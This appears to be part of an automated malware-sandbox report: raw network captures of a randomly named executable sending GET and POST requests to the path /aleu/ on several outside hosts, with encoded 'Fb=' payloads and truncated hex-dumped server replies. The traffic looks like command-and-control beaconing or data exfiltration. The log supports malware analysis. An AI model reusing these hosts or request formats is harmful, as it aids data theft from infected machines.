                            Data Ascii: Fb=yk3RZmdKeyh6EABXsHLSQwvwBt3Qvvh/lpR/3+xyyfjvUcr2JBbp+ZyAHlbmwmJg0+RZ0QzTpiWmyhKj+DftrZlIle1NaIfOfH5kB/sspJy33nLFhMWlCiuQSpDwAXnArSdfcbh7DSDbBBE5XHjYl02GBwiLptUH+7W666GX5+XLBR3KySPCxqvdnspRSawlHRYyNsve3SpzjYe3wCFyKcfMVsItALfvbJGEou7wv1kRnR12ifyQU1TEW4xtgAN8cpsO8n3Xf5KqE3SYQaqXuKEOgneNjfQ+L60Q16qLuPk9Z1Z+fjZjDC59JSgj+sksswkiLJr1uFVTAY4hyjsNf4wUq69mT9zM7x4YAGninfkp2fXqUgTkMPykf7xsy3/h5myOgXZYACVMwU7r2buX5ZIod/xwBzQQcSrAYqdwnq4FJrM6A853I2cgSn/kw3FjebliP+ejCWV5/JzkN839ALH05Eolp7uJwjFGVd8jZidlFW7vym762iKoBPapJW17KREj3+RSxzstGfNcPfuwDs6VAXiA1Ckjihq1Ixen7ZwF4aP+CVsIULoD4vzS5rgo7bYaW1mt55HKObLL21Gags9cZ7Ryyt0EJCkmAVudunbdgsX57ZMWXnIaPKwmAj0lJL/B6zhRbtYa++Lj5srVeifW05m1lcm9ygjbVWcU9F3SU75PRZ/B8aG4P8y0RrEH4kBPF2pcW5N7ZJdXBVRrcqdh/gBHlie2rdnAbuRb8eljzbIHWGGtP0ePM07brfAGSlJKsqZSo6iiO9CnEJPN2fPFwZ8KINWcmJ/4wH1KlV3kX9qItyZgchqUqmKukMRG3imWubVKcAK2WoHZWYmDyfZ+Z3jzJNr+MpGqp6ufktFHcq+7jupRFuCcI25LyeK7EG0JNZTLLdo/XpMbP3RMinnSxfGTZCogxQX0VEzD4ybLoWi8Al6EDBagyq4zfwp3Gt3L2QKekxn8yToRtXbM3NUbRViLUN49CddqG9R3B6xGMo4H1 [TRUNCATED]
                            May 14, 2024 12:53:17.595552921 CEST1289INHTTP/1.1 530
                            Date: Tue, 14 May 2024 10:53:17 GMT
                            Content-Type: text/html;charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: 8080
                            Data Raw: 31 30 33 61 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f [TRUNCATED]
                            Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
                            May 14, 2024 12:53:17.595664024 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                            Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                            May 14, 2024 12:53:17.595805883 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                            Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                            May 14, 2024 12:53:17.595822096 CEST454INData Raw: 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f e5 90 8d ef
                            Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.1049747103.93.125.69803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:20.139090061 CEST458OUTGET /aleu/?Fb=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEsJ1bmNcNLMbEIClpI49SsaijuFrxzA==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.83634.cn
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:53:20.453608036 CEST1289INHTTP/1.1 530
                            Date: Tue, 14 May 2024 10:53:20 GMT
                            Content-Type: text/html;charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Server: 8080
                            Data Raw: 31 30 33 61 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f [TRUNCATED]
                            Data Ascii: 103a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color [TRUNCATED]
                            May 14, 2024 12:53:20.453738928 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                            Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                            May 14, 2024 12:53:20.453932047 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                            Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                            May 14, 2024 12:53:20.453943968 CEST454INData Raw: 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f e5 90 8d ef
                            Data Ascii: ="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.10497483.125.172.46803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:36.428082943 CEST745OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.valentinaetommaso.it
                            Origin: http://www.valentinaetommaso.it
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.valentinaetommaso.it/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 46 62 33 37 51 75 6b 79 45 2f 47 75 32 4d 4e 6a 38 44 46 51 4e 75 44 55 73 2f 31 46 4c 5a 6c 70 78 79 67 79 6e 66 6b 49 48 70 74 6a 59 6a 44 71 79 38 6e 6d 63 6e 61 57 52 77 65 53 34 74 54 55 4c 4d 46 71 45 45 4c 7a 47 76 44 4c 6c 55 31 65 54 45 4f 59 6d 54 55 37 6d 78 58 75 6a 53 33 4f 41 37 50 65 4e 58 39 2b 67 55 37 68 54 31 76 53 51 38 46 7a 4d 5a 36 36 34 38 37 2b 31 63 69 4e 54 61 46 50 73 69 76 6c 47 49 62 74 4b 74 58 55 57 59 6d 6c 59 4c 36 63 76 6f 6a 61 6c 50 48 4f 44 32 79 44 72 49 63 6c 37 47 67 42 39 73 56 71
                            Data Ascii: Fb=nLw7bAWdiaPGFb37QukyE/Gu2MNj8DFQNuDUs/1FLZlpxygynfkIHptjYjDqy8nmcnaWRweS4tTULMFqEELzGvDLlU1eTEOYmTU7mxXujS3OA7PeNX9+gU7hT1vSQ8FzMZ66487+1ciNTaFPsivlGIbtKtXUWYmlYL6cvojalPHOD2yDrIcl7GgB9sVq
                            May 14, 2024 12:53:36.855853081 CEST1289INHTTP/1.1 404 Not Found
                            Server: openresty
                            Date: Tue, 14 May 2024 10:53:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=ne3hrrmfvvlogvrg7cebk7g3r1; path=/; domain=valentinaetommaso.it; HttpOnly
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Content-Encoding: gzip
                            Data Raw: 33 37 38 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 44 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 01 40 c9 b2 e3 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 74 92 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 f1 57 4f 5e 9e 5e ff fd f2 cc 99 64 b3 e9 e3 bf 1e f3 8f e3 4f bd 34 ed 55 a2 b8 fa 4b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa af 15 67 ea 45 e3 5e 25 cc 2a 8f ff 05 ed 03 6f f8 f8 78 1a 46 ef 9d 24 98 f6 2a 68 ec c7 51 14 f8 59 c5 99 00 50 af 62 40 0c 1b c3 b0 39 fd b8 98 74 3b a3 49 d3 f5 a7 f1 62 38 4a e2 28 73 a3 00 95 fd 24 4e d3 38 09 c7 61 b4 1d bc 11 9a a6 ee 38 cd bc 2c f4 5d 3f 9e 2d c1 98 05 99 e7 f8 13 2f 49 83 ac 57 59 64 a3 ea 61 c5 86 1c 02 cf 2f c2 b1 36 0a a7 41 5a 6b 0e f1 3f e4 cf 4d 6b e2 a6 37 e3 ef e7 93 9e 3f 68 79 9d c3 a0 bb df a9 38 d9 dd 3c 00 7d 66 de 38 a8 a1 f8 bb 0f b3 69 c5 49 c3 8f 01 48 ec 45 77 7f 0a 12 f5 4e ad de 19 f1 e7 e3 af 87 5f [TRUNCATED]
                            Data Ascii: 3781}vk; I"DQQd9d=\ I@;UwHtY/%WO^^dO4UKZqI0?*yzT;jQgE^%*oxF$*hQYPb@9t;Ib8J(s$N8a8,]?-/IWYda/6AZk?Mk7?hy8<}f8iIHEwN_DCOAKK?.7Oj/IKo_oz>9r0 8YMz:8s8r$GGpG!LU,4>67<NL0MUFazjr#%Qf)'+18f:)~lQ]/zVo~.3GFYLaNuss3O rhHQQ`3$V80C3%RSZ-F5Yk5C'3OI$O"Kg>28$}^O$qcxnz9#h{OXCIIo84ItZ6Z3%VV<NPzVoL1?a>ryxgg4Ux9YOoa|)O8Q
                            May 14, 2024 12:53:36.855880022 CEST1289INData Raw: eb 7b 59 6f 18 fb 8b 19 f4 86 fb eb 22 48 ee ae 82 29 0c b2 38 39 99 4e 77 be a5 c5 e6 3c 76 28 85 de 50 64 ff af 5e 05 92 b7 f2 ee 8d 16 b6 f7 2f e2 77 df ee 3e 0a 8e 33 17 4a 69 9c 4d 1e 05 df 7d b7 9b bd 09 de b9 49 30 8b 6f 82 93 0c 6a 6b b0
                            Data Ascii: {Yo"H)89Nw<v(Pd^/w>3JiM}I0ojkz}UQ3a$;$Tv*^^0r)2F&"FAOvLay2$vvLDfm2SweFj"Xay9BtN;aVzWUx{}g;
                            May 14, 2024 12:53:36.855895042 CEST1289INData Raw: 8e 12 c8 1b 79 76 40 9d c2 e5 c8 d5 3b 8e e3 31 ec 62 6f 3c f3 22 8c 2e a1 a7 10 7e 4c 97 8e cf ef c3 61 ef c7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 3a 7a 60 1c f5 59 f9 50 f2 8f a2 c5 7a b4 6f c1 f2 77 47 10 1c c1 a3 9b 30 0d a1 2c c3 ec
                            Data Ascii: yv@;1bo<".~La~yqq@L::z`YPzowG0,hA>VkEx\hf?~ZgF~H 4p2UAUIJ<J21ZOLW'U'OCE~P#<1+j,LN#QI+UQ.^3d\
                            May 14, 2024 12:53:36.855911016 CEST1289INData Raw: a9 3c 3e 7f ee 5c 9c 5c bf 3a bf 78 f9 e2 fc a5 f3 e4 dc d9 6c 24 2a db 10 5c a7 ac 2e b5 97 d3 3a c3 32 81 38 f8 2f c7 e3 7a 91 65 f0 c3 c3 c9 0f 3f 3c 9e 92 10 1e 79 04 69 84 df 44 83 74 fe 88 7e 48 dd 33 f6 f2 6b 50 30 8b 62 2d 59 68 ed ab b9
                            Data Ascii: <>\\:xl$*\.:28/ze?<yiDt~H3kP0b-Yh0!`5*-K/!,dIAMS_P!rrS_d~/W)Kg.f=T/`{pv%8In`zJg<\C~I|F8~^m
                            May 14, 2024 12:53:36.855926037 CEST1289INData Raw: 6e ab 03 f1 0c 19 dc 04 5f 1c 36 9b 82 e1 81 7a 06 31 65 79 60 8a 48 6b a1 25 69 fd 13 67 19 2b 3a 27 36 07 41 22 03 0b 45 6d 90 11 60 29 4c ba 6d b6 83 a8 54 8f 32 0a 19 7a 17 0b be e5 82 c7 30 ee 2e 29 d0 3c 54 8f 6d 10 53 6a 34 bb a4 43 63 9f
                            Data Ascii: n_6z1ey`Hk%ig+:'6A"Em`)LmT2z0.)<TmSj4Cc:2[ "X^_>}G"Oki+[o&?CKp @/6,ny*yg2L@]-x5?J\nDRlCC1Nb&1oGBVGO|
                            May 14, 2024 12:53:36.855938911 CEST1289INData Raw: 72 7e 7d fe f2 c5 c9 f3 6d 6a 5f 3d 3b bf bc 44 87 fd d3 97 57 06 34 10 46 3c fe 2f 58 5f 7d 46 76 08 1b a6 17 94 26 14 72 0b 46 df 18 1c 42 f5 1e db 28 58 78 fe 5d fe 5e 46 d7 cf bc 0f fd 20 52 56 cd 51 a5 21 01 e4 0b 24 a8 dc 61 3e 87 5c e6 88
                            Data Ascii: r~}mj_=;DW4F</X_}Fv&rFB(Xx]^F RVQ!$a>\uZi|WEs-8na>-oT=9+5imU=PKN)u.2oZ|wq=K#FPQV("Q;$D2;J>^+, HSpF)m
                            May 14, 2024 12:53:36.855961084 CEST1289INData Raw: 40 b9 70 6a bd 67 ae 3e c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 37 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 cc e5 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c f1 15 6e 32 7a 0f 12 7e 3d 74 bf 9e b9 5f ff dd f9 fa d9 d1 d7
                            Data Ascii: @pjg>{=:;(]7|RkOJQn|2L9q&D?9>__n2z~=t_$0@oo{w>[M}n[7/m)LiOiCwfRRw#|\%bG-OW+fKcC^N_zuEO*sdCPL<Df
                            May 14, 2024 12:53:36.855973959 CEST1289INData Raw: c5 30 d5 3c 88 3c 74 b3 98 7a 49 4e e4 87 c7 cf 71 c3 9d 40 4f 89 21 c5 7d a3 ce a7 41 a2 29 39 8e 59 3e bc 61 3c 0b 7d 84 73 a1 7f e7 24 7f 5b 8c 14 d1 60 88 e2 c2 40 71 65 b1 37 96 e1 63 b2 42 98 64 a0 1f 2c 1e de 80 e7 9c e0 3a 1c 19 35 26 6e
                            Data Ascii: 0<<tzINq@O!}A)9Y>a<}s$[`@qe7cBd,:5&nw?HWN{ p:hVJ)Blpg8sXO_SwhD{q<:@YSA4z?Y#.3No7h&!uTj[P\BV$kA>Q.EUwQE
                            May 14, 2024 12:53:36.855989933 CEST1289INData Raw: db 33 18 4b 9a f0 08 9d e7 f9 bd 3a 95 bf 84 15 f4 0f e0 86 2f c9 12 b1 fb 62 11 df c0 77 0b 43 e4 de da f3 04 5f f9 c3 14 11 a8 65 d4 65 1e 17 32 6a b0 05 b4 3a 81 8f c4 1c 3c 29 f9 0e b3 d6 0f 26 f1 14 5b 72 a8 b1 51 7c a1 0f 25 52 37 3f 86 fa
                            Data Ascii: 3K:/bwC_ee2j:<)&[rQ|%R7?ytg]tI|n!hB W8%0f>\VpXxjaRgnt*yChP!sx(Fu`IuykisRjcNsYBkQ
                            May 14, 2024 12:53:36.856004000 CEST1289INData Raw: fc 59 b9 c0 66 09 33 69 36 6f 70 b3 a2 00 01 a3 eb bb e3 97 f9 6a 11 70 ca af 4e db 50 8b 37 7e 5c 16 bb 58 32 2d 6b e3 8e 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 86 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c 6f c1 d3 f3 b3 57 b9 13 9d
                            Data Ascii: Yf3i6opjpNP7~\X2-kpO#xvp+y1?s3|oWaZdu=M7_JE\jFQ\W1VDlJ:c &#Gv6r:Yp:R*jBhn.A[kU],=,YrzLk+
                            May 14, 2024 12:53:37.172568083 CEST1289INData Raw: 52 fd d7 f2 76 7d 0b f8 5c 93 ac 8f ab 3b a4 11 be ba 64 36 c0 45 00 3c 82 b1 90 bb 62 25 24 81 a2 9a f4 e6 5c 48 35 e7 84 d5 14 9e 08 5a 7f 08 ca 19 ae dc bb 17 06 cc eb db be 44 8a c9 6d 32 2b 54 85 09 74 8b 51 20 92 4c ca 0b c2 62 e4 c5 6b 0b
                            Data Ascii: Rv}\;d6E<b%$\H5ZDm2+TtQ Lbkoz9'yC0x):r>grCV#A!;9PM7Ziz,3O^1RDTW*#Bl1>r2]G+&>p_p6{ScL-D60k>|


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.10497493.125.172.46803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:53:39.276340008 CEST769OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.valentinaetommaso.it
                            Origin: http://www.valentinaetommaso.it
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.valentinaetommaso.it/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 6e 4c 77 37 62 41 57 64 69 61 50 47 48 2b 2f 37 44 49 73 79 54 50 47 74 7a 4d 4e 6a 70 7a 46 63 4e 75 48 55 73 2b 77 65 49 71 52 70 78 58 63 79 6d 62 51 49 4f 35 74 6a 58 44 44 72 76 4d 6e 76 63 6e 47 30 52 30 57 53 34 74 58 55 4c 4a 35 71 48 7a 66 77 47 2f 44 4a 6a 55 31 6d 64 6b 4f 59 6d 54 55 37 6d 77 7a 55 6a 53 76 4f 41 76 7a 65 4e 32 39 35 38 45 37 6d 44 46 76 53 55 38 46 4a 4d 5a 37 76 34 34 62 55 31 65 71 4e 54 59 64 50 73 33 44 36 54 59 62 6a 55 64 57 33 52 59 50 43 52 65 4b 5a 72 5a 62 61 6c 39 6a 55 41 58 54 45 36 5a 39 79 6f 78 38 50 7a 71 67 41 66 39 78 2b 39 6b 77 4a 66 77 34 72 75 70 55 38 35 48 61 33 4f 41 3d 3d
                            Data Ascii: Fb=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIqRpxXcymbQIO5tjXDDrvMnvcnG0R0WS4tXULJ5qHzfwG/DJjU1mdkOYmTU7mwzUjSvOAvzeN2958E7mDFvSU8FJMZ7v44bU1eqNTYdPs3D6TYbjUdW3RYPCReKZrZbal9jUAXTE6Z9yox8PzqgAf9x+9kwJfw4rupU85Ha3OA==
                            May 14, 2024 12:53:39.668912888 CEST1289INHTTP/1.1 404 Not Found
                            Server: openresty
                            Date: Tue, 14 May 2024 10:53:39 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=iktre9knv3it4u05dfm42238io; path=/; domain=valentinaetommaso.it; HttpOnly
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            Content-Encoding: gzip
                            Data Raw: 33 37 38 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d dd 76 db c6 92 ee f5 de 6b cd 3b 20 9c 49 22 9d 88 e0 af 44 51 16 9d 51 64 39 d6 19 cb d6 b6 e4 64 f6 b6 3d 5c 20 08 92 88 49 80 01 40 c9 b2 e3 07 3b d7 e7 c5 ce f7 55 77 03 0d fe 48 74 92 59 b3 2f 8e 97 25 81 e8 ee ea ea ea ea aa ea ea aa e6 f1 57 4f 5e 9e 5e ff fd f2 cc 99 64 b3 e9 e3 bf 1e f3 8f e3 4f bd 34 ed 55 a2 b8 fa 4b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa af 15 67 ea 45 e3 5e 25 cc 2a 8f ff 05 ed 03 6f f8 f8 78 1a 46 ef 9d 24 98 f6 2a 68 ec c7 51 14 f8 59 c5 99 00 50 af 62 40 0c 1b c3 b0 39 fd b8 98 74 3b a3 49 d3 f5 a7 f1 62 38 4a e2 28 73 a3 00 95 fd 24 4e d3 38 09 c7 61 b4 1d bc 11 9a a6 ee 38 cd bc 2c f4 5d 3f 9e 2d c1 98 05 99 e7 f8 13 2f 49 83 ac 57 59 64 a3 ea 61 c5 86 1c 02 cf 2f c2 b1 36 0a a7 41 5a 6b 0e f1 3f e4 cf 4d 6b e2 a6 37 e3 ef e7 93 9e 3f 68 79 9d c3 a0 bb df a9 38 d9 dd 3c 00 7d 66 de 38 a8 a1 f8 bb 0f b3 69 c5 49 c3 8f 01 48 ec 45 77 7f 0a 12 f5 4e ad de 19 f1 e7 e3 af 87 5f [TRUNCATED]
                            Data Ascii: 3781}vk; I"DQQd9d=\ I@;UwHtY/%WO^^dO4UKZqI0?*yzT;jQgE^%*oxF$*hQYPb@9t;Ib8J(s$N8a8,]?-/IWYda/6AZk?Mk7?hy8<}f8iIHEwN_DCOAKK?.7Oj/IKo_oz>9r0 8YMz:8s8r$GGpG!LU,4>67<NL0MUFazjr#%Qf)'+18f:)~lQ]/zVo~.3GFYLaNuss3O rhHQQ`3$V80C3%RSZ-F5Yk5C'3OI$O"Kg>28$}^O$qcxnz9#h{OXCIIo84ItZ6Z3%VV<NPzVoL1?a>ryxgg4Ux9YOoa|)O8Q
